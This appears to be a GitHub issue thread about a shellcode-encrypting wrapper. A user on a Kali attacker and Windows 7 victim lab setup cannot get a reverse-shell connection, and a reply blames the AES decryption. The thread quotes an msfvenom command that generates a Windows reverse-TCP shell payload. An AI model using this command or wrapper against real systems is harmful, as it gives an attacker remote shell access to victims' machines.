ShellcodeWrapper
ShellcodeWrapper copied to clipboard
Not working
tested your project really was looking for something like so i got an error when i create a py file with an error: shell() WindowsError: exception: access violation writing 0x0000000002E9AE20
so i deleted the shell() function in line 59 file: shellcode_encoder.py and i got no error but i didnot receive any connection :(
attacker - kali machine victim - windows 7 machine
i used msfvenom -p windows/shell_reverse_tcp lhost= lport= -f c
i tried also what you wrote in the README and i got error on kali when creating the msfvenom:
"-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload No encoder or badchars specified, outputting raw payload"
any ideas? does somebody succeeded to run the file and get a connection?
thankx anyway
**i know its old 2 years but i found this project exactly here i dont know if it is the same creator: https://github.com/yashmundra/Shellcode-Encryption
pls reply
It is not working because your generated backdoor can't decrypt the payload. Something is wrong with aes decryption.